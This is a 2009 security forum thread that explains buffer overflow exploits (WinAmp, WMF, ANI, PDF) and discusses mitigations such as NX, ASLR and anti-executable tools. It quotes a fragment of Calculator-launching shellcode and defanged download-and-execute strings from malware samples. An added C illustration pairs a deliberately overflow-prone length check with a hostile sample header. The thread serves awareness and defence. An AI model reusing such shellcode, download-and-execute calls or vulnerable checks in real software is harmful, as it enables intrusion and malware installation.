Buffer Overflow Attacks Unmasked

Discussion in 'other security issues & news' started by Rmus, Jun 6, 2009.

Thread Status:
Not open for further replies.
  1. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    A description of buffer overflow is presented here:

    http://en.wikipedia.org/wiki/Buffer_overrun

    In addition to the technical aspects, it's instructive to look at the practical uses of buffer overflow by malware in the wild.

    Essentially, a malware writer finds an application with a buffer overflow vulnerability and crafts a file for that application with his/her own Shellcode (instructions) to carry out the attack.

    Proofs of Concept (PoC) demonstrate this, often by having the Shellcode (instructions) launch the Windows Calculator.

    Here is a PoC for WinAmp - Parsing Integer Overflow Exploit

    The author's Shellcode:

    Code:
    /* win32_exec ... CMD=Calc */

    char Calc_ShellCode [] =
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
        "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"

    ...
    
    If a malware writer decides to craft an exploit in the wild for this vulnerability, what Shellcode (instructions) do you think would most likely be included?

    • launch the calculator

    • popup message, "Hi There!"

    • delete the user's photographs of Aunt Minnie

    • format the user's hard drive

    • connect out to a server to download malware

    If you chose the last, you are familiar with some of the current Buffer Overflow Exploits that have surfaced in the wild. Here are three examples.

    WMF

    Probably the most sensational use of this type of exploit was the Windows Media File Handling Buffer Overflow Vulnerability (.wmf file). The exploit was later used in other image file types and various image viewers, including Irfan. This is from an analysis:

    http://blog.threatfire.com/2007/12/shellcode-analysis-download-n-exec.html

    ANI

    Preceding WMF was the Animated Cursor Buffer Overflow Vulnerability (.ani file). Inside the file was similar code to download a trojan:

    Code:
    urlmon.dll_URLDownloadToFileA
    hxxp://kunxxxxxxxx.de/daten/dlle.exe
    dlle.exe was later detected as Trojan-Downloader.Win32.Agent


    PDF

    Most recent are the buffer overflow exploits in Adobe Acrobat Reader (.pdf file). Same code:

    Code:
    URLMON.DLL. URLDownloadToFileA.
    hxxp://xxxxxxxxxxxx.cn/load.php?
    load.exe was later detected as InfoStealer.Snifula.a


    Buffer Overflow is a useful exploit technique and, most likely, more vulnerabilities in applications already exploited, and in other applications, wait to be discovered.

    PREVENTATIVE MEASURES

    • Naturally, if the user has a patched version of the application, the exploit fails. Experience shows, however, that there is often a window of opportunity between the release of the exploit in the wild and the emergence of a patch.

    • Anti-virus products that flag the malicious file. These may not be reliable because the files often go undetected for a period of time.

    • Products that protect against Buffer Overflow. I've read about these but have not seen tests against exploits in the wild.

    • Products that block the installation of the malware executables. Many solutions available.

    ----
    rich
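    As an added illustration (not from this thread or from the WinAmp PoC it links), here is the kind of length check that a "parsing integer overflow" bug in a file parser gets wrong, beside a hardened version; the chunk layout (4-byte little-endian length prefix) and the sample bytes are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define CHUNK_MAX 64   /* fixed-size destination buffer, as many parsers use */
#define HDR_LEN   4u   /* 4-byte little-endian length prefix (constructed layout) */

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Flawed check: len + HDR_LEN is 32-bit arithmetic and wraps, so a declared
 * length near UINT32_MAX passes the "chunk fits in the file" test and the
 * memcpy that follows it in a real parser would run off the end of the buffer. */
int vuln_length_ok(uint32_t len, uint32_t avail) {
    return (len + HDR_LEN) <= avail;   /* wraps for len >= 0xFFFFFFFC */
}

/* Hardened check: subtract instead of add (cannot wrap once avail >= HDR_LEN)
 * and bound the length by the destination buffer, not only by the file size. */
int safe_length_ok(uint32_t len, size_t avail) {
    if (avail < HDR_LEN) return 0;
    if (len > avail - HDR_LEN) return 0;
    if (len > CHUNK_MAX) return 0;
    return 1;
}

/* Copy one length-prefixed chunk into out[CHUNK_MAX]. Returns the payload
 * length copied, or -1 if the chunk is rejected. */
int safe_parse_chunk(const uint8_t *file, size_t file_len, uint8_t *out) {
    if (file_len < HDR_LEN) return -1;
    uint32_t len = read_le32(file);
    if (!safe_length_ok(len, file_len)) return -1;
    memcpy(out, file + HDR_LEN, len);
    return (int)len;
}

/* Constructed samples (not taken from any real file): a benign 5-byte chunk,
 * and a header declaring 0xFFFFFFFE bytes so that the naive check wraps. */
static const uint8_t good_chunk[]    = {0x05, 0x00, 0x00, 0x00, 'h', 'e', 'l', 'l', 'o'};
static const uint8_t hostile_chunk[] = {0xFE, 0xFF, 0xFF, 0xFF, 'A', 'A', 'A', 'A'};

/* Returns 1 when the naive check accepts the hostile header, i.e. the integer
 * overflow is present; safe_parse_chunk rejects the same bytes. */
int hostile_passes_naive_check(void) {
    return vuln_length_ok(read_le32(hostile_chunk), (uint32_t)sizeof hostile_chunk);
}
```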
     
  2. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Good info as always, and very fortuitous too, as I posted in another thread regarding Buffer Attacks the other day.

    Yeah, I sure remember the fun I had with the WMF exploits, trying to get blasted on IE6/98SE with a whole host of those nasties. But I couldn't, no matter how many times I tried. You were heavily involved in testing and analysis, if I remember correctly.
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Yes, I remember your posts. Win98 was not vulnerable, I think. Win2K was, but I could not get any of the infected websites to trigger the exploit. I set up my XP Laptop to test, and sure enough, it worked. The exploit used an i-frame to download the .wmf file into the Windows Picture and Fax Viewer. Win2K has neither that file-type association, nor that viewer.

    You may remember there was a lot of confusion about this exploit (late Dec 2005) and Microsoft didn't release a patch until the following week. Also, there were different attack vectors, as this cert.org chart from early 2006 showed:

    [image: exploitChart.gif]

    I mention this because this whole episode was instructive for me regarding prevention. A friend was also looking at this exploit at that time, and we agreed that you have to do your own work and dig for the information to find out what is going on, so that you can advise those you are helping. Many of the articles were caught up in the frenzy to find work-arounds, including a third-party patch released before the Microsoft patch. For us, getting the pertinent specific information negated the need for a frantic reaction.

    In other words, you have to unmask the exploit to see what is really going on.

    I had seen the web site exploits but cert.org summarized the other methods. This verified that only IE would trigger the web-based exploit, where other browsers prompted for the download, which I confirmed. I was able to assure those I helped at that time that the web-based exploit would fail, since they were using Opera. The other methods required the user to click on the image in an email attachment, which, I was pretty sure, they wouldn't do! Nonetheless, they had protection against the executable component of the exploit, just in case.

    One other point you may remember: several people crafted some benign Proofs of Concept .wmf files that launched the Windows Calculator, to prove that embedded code could do most anything. My friend and I searched in vain for WMF exploits that did something other than download malware and found none, nor any reports of any.

    This was not surprising, nor is it today: the aim of exploits in the wild is to get malware onto the system. That is where the money is.

    ----
    rich
     
    Last edited: Jun 8, 2009
  4. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    I have always disabled I-Frames, and a lot of the other Internet Options in IE, but as you say 98SE turned out to be safe, and safer than XP lol.

    I've lost count of the amount of Proof of Concept .WMF files I, you and others tested, posting screenies of all the events.

    Some people reading this might not know that at the time this "hole" in Windows was called "Microsoft's back door", which was later retracted. But it appeared as if it could be at first.

    Yes, Anti EXE Apps are definitely a good idea. I know you swear by Faronics Anti-Executable (previous version) and I used WinSonar free for many years with great success http://digilander.libero.it/zancart/winsonar.html
     
  5. chronomatic

    chronomatic Registered Member

    Joined:
    Apr 9, 2009
    Posts:
    1,343
    Buffer overflows (on the stack and heap) can be mitigated with various compiler options like Position Independent Code (no such thing on Windows), stack smashing protections, ASLR, executable space protection, and a MAC system.

    Most 64 bit processors have the "NX bit" which can make certain areas of the memory non-executable. I think Vista has some of these protections built in (I know it utilizes the NX bit as well as ASLR, though Microsoft was about 5 years behind BSD and Linux on this). XP SP2 also uses the NX bit, but not ASLR. No version of Windows has a MAC system built in yet, though there are third party solutions I believe (usually referred to as HIPS).

    The PaX developers were the first to implement many of these measures (especially ASLR) and make them workable, but PaX was developed as a Linux kernel patch (all of this third party software aimed at Windows that utilizes these technologies is pretty much just a Windows port of PaX. In fact, Microsoft's own implementation of ASLR in Vista was "inspired" by all the work that the PaX team did). The same goes for the WehnTrust HIPS. At the bottom of their page, they give credit to the PaX team.

    I can say from experience that the aforementioned "measures" will indeed stop some (not all) of these attacks dead. However, a side effect is that it will often kill programs that intentionally allow data to be executed and/or written outside of the buffer. Therefore, it can take a lot of "tweaking" to get some applications to work. In a perfect world, application developers wouldn't allow their programs to utilize memory where it shouldn't be. But then again, in a perfect world there would be no need for these protections at all because the programmers would be perfect. :)
     